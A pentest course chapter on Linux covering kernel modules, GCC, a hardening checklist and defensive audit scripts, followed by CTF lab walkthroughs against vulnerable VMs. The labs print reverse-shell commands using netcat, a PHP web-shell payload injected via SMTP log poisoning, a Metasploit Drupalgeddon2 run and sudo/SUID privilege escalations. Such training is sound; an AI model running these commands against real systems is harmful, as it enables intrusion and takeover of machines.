Chapter 09


SUMMARY

- Chap01: Introduction to “Pentest”
- Chap02: Gathering Target Information: Reconnaissance, Footprinting, and Social Engineering
- Chap03: Gathering Network and Host Information: Scanning and Enumeration
- Chap04: System Pentesting: Password Cracking, Escalating Privileges, and Hiding Files
- Chap05: Trojans, Backdoors, Viruses, and Worms
- Chap06: Gathering Data from Networks: Sniffers
- Chap07: Web Pentesting: Google, Web Servers, Web Application Vulnerabilities,
- Chap08: Attacking Web Applications: SQL Injection
- Chap09: Pentesting Linux Systems
- Chap10: Pentesting Mobile Platforms (Android)


Chapter 09: Hacking Linux Systems

OBJECTIVES COVERED IN THIS CHAPTER

- Understand how to compile a Linux kernel
- Understand GCC compilation commands
- Understand how to install LKM modules
- Understand Linux hardening methods


Linux is a popular operating system with system administrators because of its open source code and its flexibility, which allows anyone to modify it. Because of the open source nature of Linux, there are many different versions, known as distributions (or distros).

Several of the Linux distributions have become robust commercial operating systems for use on workstations as well as servers. Popular commercial distributions include: [slide: list of popular commercial distributions]

Linux's flexibility and the fact that it's open source, together with the increase in Linux applications, have made Linux the operating system of choice for many systems.
Linux commands

[slide: table of common Linux commands]

Linux directories

[slide: table of the Linux directory layout]
GCC Compilation Commands

GNU Compiler Collection (GCC) is a command-line compiler that takes source code and makes it an executable. You can download it from http://gcc.gnu.org (many Linux distributions also include a version of GCC). GCC can be used to compile C, C++, and FORTRAN source so the resulting applications are able to run on a Linux system.

Compiling C++ code with GCC for use as an application:
g++ filename.cpp -o outputfilename.out

Compiling C code with GCC for use as an application:
gcc filename.c -o outputfilename.out
Linux Kernel Modules

Linux Kernel Modules (LKMs) let you add functionality to your operating system without having to recompile the OS. A danger of using LKMs is that a rootkit can easily be created as an LKM, and if loaded, it infects the kernel. For this reason, you should download LKMs only from a verified good source.

Examples of LKM rootkits are Knark, Adore, and Rtkit. Because they infect the kernel, these rootkits are more difficult to detect than those that do not manifest themselves as LKMs. Once a system has been compromised, the hacker can put the LKM in the /tmp or the /var/tmp directory, which the system administrator usually does not monitor, thereby hiding processes, files, and network connections. System calls can also be replaced with those of the hacker's choosing on a system infected by an LKM rootkit.
Linux Hardening Methods

Hardening is the process of improving security on a system by making modifications to the system. Linux can be made more secure by employing some hardening methods:

01 Ensure that the server is in a secure location such as a network operations center, which prevents a hacker from gaining physical access to the system.

02 Use strong passwords and do not give out usernames or passwords. Administrators should make sure the system doesn't have null passwords by verifying that all user accounts have passwords in the Linux /etc/shadow file.

03 The default security stance of deny all is a good one for hardening a system from a network attack. Next, the administrator can open certain access for specific users. To deny all users access from the network (this applies to services that honour TCP wrappers):
echo "ALL: ALL" >> /etc/hosts.deny
Recommended steps to improve the security of a Linux server

1. Operating System Selection and Installation
- Use a widely recognized and known good Linux distribution
- Apply any operating system patches that have been released since the installation media was created
- Set up and enable iptables
- Install a host-based intrusion detection system (HIDS)
- Don't install unnecessary applications or services
- Secure the boot loader program (such as LILO or GRUB) with a password

2. Securing Local File Systems
- Look for inappropriate file and directory permissions (group- and/or world-writable system executables and directories; group- and/or world-writable user home directories)
- Encrypt sensitive data present on the system
- Select mount options (such as nosuid) for local file systems that take advantage of security features provided by the operating system

3. Configuring and Disabling Services
- Remove or disable all unneeded services
- Use secure versions of daemons when they are available
- If at all possible, run server processes as a special user created for that purpose and not as root
- When appropriate, run servers in an isolated directory tree via the chroot facility
- Specify access control and logging for all services
4. Securing the Root Account
- Select a secure root password, and plan a schedule for changing it regularly
- If possible, restrict the use of the su command to a single group
- Use sudo or system roles to grant other ordinary users limited root privilege when needed
- Prevent direct root logins except on the system console

5. Defining User Account Password Selection and Aging Settings
- Set up default user account restrictions as appropriate
- Ensure that administrative and other system accounts to which no one should ever log in have a disabled password and /bin/false or another non-login shell
- Remove unneeded predefined default accounts

6. Securing Remote Authentication
- Disable /etc/hosts.equiv and .rhosts password-less authentication
- Use ssh and its related commands for all remote user access. Disable rlogin, rsh, telnet, ftp, rcp, and so on

7. Performing Ongoing System Monitoring
- Configure the syslog facility. Send or copy syslog messages to a central syslog server for redundancy
- Design and implement a plan for monitoring log information for security-related events

8. Performing Miscellaneous Activities
- Remove any remaining source code for the kernel or additional software packages from the system
- Add the new host to the security configuration on other systems, in router access control lists, and so forth
- Check for vendor security updates for any installed software
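The null-password check from hardening method 02 and the disabled-password/non-login-shell rule from step 5 can be audited together. The script below is an added example written for this chapter, not code from the slides: it runs on constructed passwd and shadow lines (on a live host it would read /etc/passwd and /etc/shadow as root), and the UID_MIN cutoff of 1000 and the list of non-login shells are assumptions to adjust per distribution.

```python
"""Audit passwd/shadow-style data for null passwords and login-capable
system accounts (added example for this chapter, not from the slides)."""
from dataclasses import dataclass

# Shells that refuse interactive logins (assumed list; adjust per distro).
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
# First UID for ordinary users on most distributions (assumption).
UID_MIN = 1000


@dataclass(frozen=True)
class Finding:
    user: str
    problem: str


def parse_colon_file(text):
    """Split passwd/shadow lines into their colon-separated fields, keyed by user."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def audit(passwd_text, shadow_text):
    """Return the findings a hardening review would flag."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, fields in passwd.items():
        uid, shell = int(fields[2]), fields[6]
        if uid == 0 and user != "root":
            findings.append(Finding(user, "uid 0 account other than root"))
        sh = shadow.get(user)
        if sh is None:
            findings.append(Finding(user, "no /etc/shadow entry"))
            continue
        pw = sh[1]
        if pw == "":
            # Method 02: an empty hash field means login without a password.
            findings.append(Finding(user, "null password"))
        if uid < UID_MIN and user != "root":
            # Step 5: system accounts need a disabled password and a non-login shell.
            if shell not in NOLOGIN_SHELLS:
                findings.append(Finding(user, f"system account with login shell {shell}"))
            if not pw.startswith(("!", "*")):
                findings.append(Finding(user, "system account with enabled password"))
    return findings


# Constructed sample data; the hash fields are placeholders, not real digests.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
guest:x:1001:1001::/home/guest:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASH:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
backup:$6$saltsalt$PLACEHOLDERHASH:18000:0:99999:7:::
alice:$6$saltsalt$PLACEHOLDERHASH:18000:0:99999:7:::
guest::18000:0:99999:7:::
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{f.user}: {f.problem}")
```

On the sample, guest is reported for a null password and backup twice, once for its login shell and once for its enabled password; daemon, alice and root pass.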
Workshop: Linux Web server exploitation

Machines used in the labs:
- DC6
- CyberSploit 1
- VulnCMS: 1
- symfonos1
- WestWild

LAB 0: WestWild
CTF Name: WestWild: 1.1

Tags:
- Enumeration with Enum4Linux
- Remote access to a shared folder with smb://X.X.X.X
- base64 decode
- Finding writable folders: find / -writable -type d 2>/dev/null
---------------------------------------------------------------------------------------------------------------------
- enum4linux 192.168.1.104
- smbclient //192.168.1.104/wave
- ls
- get FLAG1.txt
- get message_from_aveng.txt
- base64 -d FLAG1.txt
- ssh wavex@192.168.70.134 (password: door+open)
- find / -writable -type d 2>/dev/null
- cd /usr/share/av/westsidesecret
- ls
- cat ififorget.sh
- su aveng
- sudo -l (this user can do everything with sudo)
- sudo su
- cd /root
- cat FLAG2.txt
LAB 1: CyberSploit 1

01 Get the target machine IP address
02 Scan open ports by using the Nmap scanner
03 Enumerate the HTTP service and get the first flag
04 Get shell access and get the first flag
05 Get root access and read the third flag
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 10.10.10.0/24
10.10.10.149

The victim is at 10.10.10.149

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 10.10.10.149
22/tcp open ssh
80/tcp open http

Few ports are open on the target machine: port 22, which is used for the SSH service, and port 80 for the HTTP service.

┌──(kali㉿kali)-[~/Desktop]
└─$ dirb http://10.10.10.149

+ http://10.10.10.149/cgi-bin/ (CODE:403|SIZE:288)
+ http://10.10.10.149/hacker (CODE:200|SIZE:3757743)
+ http://10.10.10.149/index (CODE:200|SIZE:2333)
+ http://10.10.10.149/index.html (CODE:200|SIZE:2333)
+ http://10.10.10.149/robots (CODE:200|SIZE:79)
+ http://10.10.10.149/robots.txt (CODE:200|SIZE:79)
+ http://10.10.10.149/server-status (CODE:403|SIZE:293)
A robots.txt file was found by directory enumeration.

An alphanumeric string is available in robots.txt; identify and decode it with https://gchq.github.io/ (use the Magic operation):
Good Work !.Flag1: cybersploit{youtube.com/c/cybersploit}

Check the HTML content of the web page. Username: itsskv

SECTION 3: « FROM INITIAL ACCESS TO HIGHER PRIVILEGES »

SSH port 22 was also open on the target machine. As we have a valid username but no clue about the password was found, we tried using the flag as the password for logging into SSH.

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh itsskv@10.10.10.149
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$

Checked the user folder and found the second flag file:

itsskv@cybersploit-CTF:~$ ls
Desktop Documents Downloads examples.desktop flag2.txt Music Pictures Public Templates Videos
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100
01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111
01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111
01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

The content is binary-encoded text; decode it with https://gchq.github.io/ (Magic operation):
good work !.flag2: cybersploit{https:t.me/cybersploit1}
Gather information about the operating system and the kernel version:

itsskv@cybersploit-CTF:~$ uname -a
Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
itsskv@cybersploit-CTF:~$ cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

We searched the web for an available exploit for this configuration (a local exploit for Ubuntu 12.04.5):

https://www.exploit-db.com/exploits/372
Download the exploit to Kali and run a web server:

┌──(kali㉿kali)-[~/Desktop]
└─$ wget https://www.exploit-db.com/download/37292

┌──(kali㉿kali)-[~/Desktop]
└─$ mv 37292 37292.c

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo python -m SimpleHTTPServer 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 ...

On the victim, download, compile and run the exploit:

itsskv@cybersploit-CTF:/tmp$ wget http://10.10.10.140/37292.c
itsskv@cybersploit-CTF:/tmp$ gcc -o exploit 37292.c
itsskv@cybersploit-CTF:/tmp$ chmod +x exploit
itsskv@cybersploit-CTF:/tmp$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls
finalflag.txt
# cat finalflag.txt

[ASCII-art banner: "CYBERSPLOIT" and "congratulations"]

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

if you like it share with me https://twitter.com/cybersploit1.

Thanks !
#
LAB 2: VulnCMS: 1

01 Get the target machine IP address
02 Scan open ports by using the Nmap scanner
03 Fingerprint the CMS in use
04 Use Metasploit
05 Exploit the sudo misconfiguration
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 10.10.10.0/24
10.10.10.149

The victim is at 10.10.10.150

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -A 10.10.10.150
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety &#8211; Just another WordPress site
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home
9001/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety.web

Services identified:
- 80: web server
- 5000: WordPress 5.7.2
- 8081: Joomla
- 9001: Drupal 7 (Drupalgeddon!)
Launch the Metasploit console:

┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole

Search for an exploit for Drupal 7:

msf6 > search Drupal 7

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Configure the Drupalgeddon 2 exploit:

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 10.10.10.140
lhost => 10.10.10.140
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lport 5151
lport => 5151
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 10.10.10.150
rhosts => 10.10.10.150
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 9001
rport => 9001
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 10.10.10.140:5151
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.150
[*] Meterpreter session 1 opened (10.10.10.140:5151 -> 10.10.10.150:42766) at 2021-12-02 04:40:00 -0500

meterpreter >

The Meterpreter session is open now.
Enumeration:

meterpreter > ls
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 includes
100755/rwxr-xr-x 529 fil 2017-02-01 16:34:27 -0500 index.php
100755/rwxr-xr-x 703 fil 2017-02-01 16:34:27 -0500 install.php
40755/rwxr-xr-x 4096 dir 2021-05-31 06:47:40 -0400 misc
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 modules
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 profiles
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 scripts
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 sites

Unusual directory “misc” (its modification time differs from the rest):

meterpreter > cd misc
meterpreter > ls
100755/rwxr-xr-x 25035 fil 2017-02-01 16:34:27 -0500 ajax.js
100755/rwxr-xr-x 118 fil 2017-02-01 16:34:27 -0500 arrow-asc.png
100755/rwxr-xr-x 118 fil 2017-02-01 16:34:27 -0500 arrow-desc.png
100755/rwxr-xr-x 968 fil 2017-02-01 16:34:27 -0500 authorize.js
100755/rwxr-xr-x 8426 fil 2017-02-01 16:34:27 -0500 autocomplete.js
100644/rw-r--r-- 45 fil 2021-05-31 06:47:01 -0400 tyrell.pass
40755/rwxr-xr-x 4096 dir 2017-02-01 16:34:27 -0500 ui
100755/rwxr-xr-x 265 fil 2017-02-01 16:34:27 -0500 vertical-tabs-rtl.css

tyrell.pass is interesting.
meterpreter > cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_

A username and password. Try them over SSH:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh tyrell@10.10.10.150
The authenticity of host '10.10.10.150 (10.10.10.150)' can't be established.
ECDSA key fingerprint is SHA256:h1aOta4T0KpyD681E4pY8S7j2G4oSkfr23vwKMUD0B8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.150' (ECDSA) to the list of known hosts.
tyrell@10.10.10.150's password:

tyrell@vuln_cms:~$

Enumerate sudo rights:

tyrell@vuln_cms:~$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl

tyrell can run /bin/journalctl as root without a password.
To escape from /bin/journalctl with the higher privilege, enter !/bin/sh:

May 28 12:16:41 vuln_cms kernel: DMA32 [mem 0x0000000001000000-0x000000007ffeffff]
May 28 12:16:41 vuln_cms kernel: Normal empty
May 28 12:16:41 vuln_cms kernel: Device empty
May 28 12:16:41 vuln_cms kernel: Movable zone start for each node
May 28 12:16:41 vuln_cms kernel: Early memory node ranges
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
4359537020406305

Flag: 4359537020406305
LAB 3: DC6

01 Get the target machine IP address
02 Scan open ports by using the Nmap scanner
03 Enumeration with WPScan (HINT: the password contains k01)
04 Exploiting: Searchsploit
05 Exploit the sudo misconfiguration
- Scan with nmap to discover the target:
nmap -p- -A 192.168.62.131
-> port 80 is open
- Add wordy to the hosts file:
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nano /etc/hosts
-> 192.168.1.164 wordy
- Web reconnaissance:
whatweb http://wordy
-> WordPress
- Enumerate users:
┌──(kali㉿kali)-[~/Desktop]
└─$ wpscan --url http://wordy --enumerate u
-> admin mark graham sarah jens
- Create the file users.txt containing the usernames
- Use the HINT to create the passwords file:
┌──(kali㉿kali)-[~/Desktop]
└─$ grep k01 /usr/share/wordlists/rockyou.txt > passwords.txt

- Brute-force the password:
┌──(kali㉿kali)-[~/Desktop]
└─$ wpscan --url http://wordy -U /home/kali/Desktop/users.txt -P /home/kali/Desktop/passwords.txt
-> SUCCESS: mark / helpdesk01
- Connect to the back office: http://wordy/wp-admin
-> not enough privileges
-> notice a plugin “Active-monitor”
Searchsploit Active-monitor:
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit Activity monitor
Copy the exploit to the desktop:
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m 45274
Launch a listener on Kali:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nlvp 9999
Go to the activity monitor page, inspect the input field in the page code, change its size to 100 and enter: 127.0.0.1 | nc 192.168.1.142 1234 -e /bin/bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlp 1234
listening on [any] 1234 ...
connect to [192.168.1.142] from wordy [192.168.1.164] 51414
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
-> Not privileged
cd /home/
cd mark
ls
Stuff
cd stuff
ls
things-to-do.txt
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

Connect with SSH as user graham:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh graham@192.168.1.164

Enumerate sudo rights:
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

Show backups.sh with cat:
graham@dc-6:~$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

Edit backups.sh (to execute /bin/bash):
#!/bin/bash
#tar -czf backups.tar.gz /var/www/html
/bin/bash

-> Connected as jens
jens@dc-6:/home/graham$
jens@dc-6:/home/graham$ sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

Create an nmap script and execute it:

jens@dc-6:/home/graham$ echo "os.execute('/bin/sh')" > /tmp/root.nse
jens@dc-6:/home/graham$ sudo nmap --script=/tmp/root.nse

id now shows uid=0 (root).
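The sudo misconfigurations in LAB 2 and LAB 3 (journalctl and nmap runnable as root without a password, and a script under a user's home directory runnable as another user) are the kind of thing a hardening review should catch from `sudo -l` output before anyone else does. The parser below is an added example for this chapter, not code from the slides: the sample output is constructed from the lab machines, the writable-file check is injected so the script runs offline, and the set of shell-escaping binaries is seeded only with the two the labs use.

```python
"""Flag sudo rules that can hand the caller a shell (added example for this
chapter; the sample `sudo -l` output is constructed, not captured)."""
import os
import re

# Binaries that can spawn a shell when run under sudo: journalctl through its
# pager, nmap through --script. Seeded from the labs; extend with your own list.
SHELL_ESCAPE_BINARIES = {"journalctl", "nmap"}

# "(root) NOPASSWD: /bin/journalctl"  ->  runas, tag list, command line
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return (runas, tags, command) for each rule line of `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = set(re.findall(r"([A-Z]+):", m.group("tags")))
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def assess(rules, writable=None):
    """Return (command, reason) for rules a hardening review should revisit."""
    if writable is None:
        def writable(path):  # on a live host: can the current user modify the target?
            return os.access(path, os.W_OK)
    findings = []
    for runas, tags, cmd in rules:
        target = cmd.split()[0]
        binary = os.path.basename(target)
        reason = None
        if cmd == "ALL":
            reason = f"unrestricted command as {runas}"
        elif binary in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
            # The NOEXEC tag stops the command from exec'ing children (the pager,
            # the Lua os.execute), which is the fix short of removing the rule.
            reason = f"{binary} can spawn a shell as {runas}; add NOEXEC or drop the rule"
        elif writable(target):
            reason = f"{target} is writable by the caller and runs as {runas}"
        if reason:
            if "NOPASSWD" in tags:
                reason += " (no password required)"
            findings.append((cmd, reason))
    return findings


# Constructed `sudo -l` output modelled on the lab machines.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (root) NOPASSWD: /bin/journalctl
    (root) NOPASSWD: /usr/bin/nmap
    (jens) NOPASSWD: /home/jens/backups.sh
    (root) /usr/bin/apt-get update
"""


def sample_writable(path):
    """Offline stand-in for os.access: only the home-directory script is writable."""
    return path == "/home/jens/backups.sh"


if __name__ == "__main__":
    for cmd, reason in assess(parse_sudo_l(SAMPLE_SUDO_L), sample_writable):
        print(f"{cmd}: {reason}")
```

The apt-get rule is left alone because the review targets only shell escapes and caller-writable targets, not every command that runs as root.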
LAB 4: symfonos1

01 Scanning: Nmap
02 Enumeration: SMB shared folders, WPScan
03 Exploiting: WordPress again, LFI; LFI to RCE via SMTP log poisoning
04 Privilege escalation: SUID
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.0/24
Nmap scan report for 192.168.1.1
Host is up (0.0022s latency).
Nmap scan report for 192.168.1.2
Host is up (0.00034s latency).
Nmap scan report for 192.168.1.142
Host is up (0.00014s latency).
Nmap scan report for 192.168.1.171

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -A 192.168.1.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.25 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

SMB is active: try to enumerate shares.

┌──(kali㉿kali)-[~/Desktop]
└─$ enum4linux 192.168.1.171
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk

[+] Attempting to map shares on 192.168.1.171
//192.168.1.171/print$ Mapping: DENIED, Listing: N/A
//192.168.1.171/helios Mapping: DENIED, Listing: N/A
//192.168.1.171/anonymous Mapping: OK, Listing: OK
//192.168.1.171/IPC$ [E] Can't understand response:

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //192.168.1.171/anonymous
smb: \> ls
. D 0 Fri Jun 28 21:14:49 2019
.. D 0 Fri Jun 28 21:12:15 2019
attention.txt N 154 Fri Jun 28 21:14:49 2019
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //192.168.1.171/anonymous
smb: \> get attention.txt

┌──(kali㉿kali)-[~/Desktop]
└─$ cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty'
and 'baseball'! Next person I find using one of these passwords
will be fired!

Test the passwords 'epidioko', 'qwerty' and 'baseball' for the helios user:

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //192.168.1.171/helios --user=helios
Password for [WORKGROUP\helios]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 28 20:32:05 2019
.. D 0 Fri Jun 28 20:37:04 2019
research.txt A 432 Fri Jun 28 20:32:05 2019
todo.txt A 52 Fri Jun 28 20:32:05 2019
19994224 blocks of size 1024. 17305316 blocks available
smb: \> get todo.txt

┌──(kali㉿kali)-[~/Desktop]
└─$ cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.1.171 symfonos.local

Go to http://192.168.1.171/h3l105/

┌──(kali㉿kali)-[~/Desktop]
└─$ whatweb http://192.168.1.171/h3l105/
-> WordPress 5.2.2
Enumerate plugins and look for a vulnerable one:

┌──(kali㉿kali)-[~/Desktop]
└─$ wpscan --url http://symfonos.local/h3l105/ --enumerate p

[i] Plugin(s) Identified:

[+] mail-masta
| Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit mail masta
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m 40290

┌──(kali㉿kali)-[~/Desktop]
└─$ cat 40290.txt

Go to http://192.168.1.171/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

To escalate the LFI to RCE we can use the SMTP log poisoning approach:
telnet 192.168.0.16 25
MAIL FROM: <sof>
RCPT TO: Helios
data
<?php system($_GET['c']); ?>
.

Go to http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=id
Run the netcat reverse command and start a netcat listener on Kali:

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlp 1234
listening on [any] 1234 ...

Go to: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc 192.168.1.142 1234 -e /bin/sh

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlp 1234
listening on [any] 1234 ...
connect to [192.168.1.142] from symfonos.local [192.168.1.171] 35234

Search for SUID files:
find / -perm -u=s -type f 2>/dev/null
-> /opt/statuscheck (executed as root)

strings /opt/statuscheck
-> curl

Try to export the path for a rogue curl:
cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
echo $PATH
export PATH=/tmp:$PATH
/opt/statuscheck
id
cd /root
cat proof.txt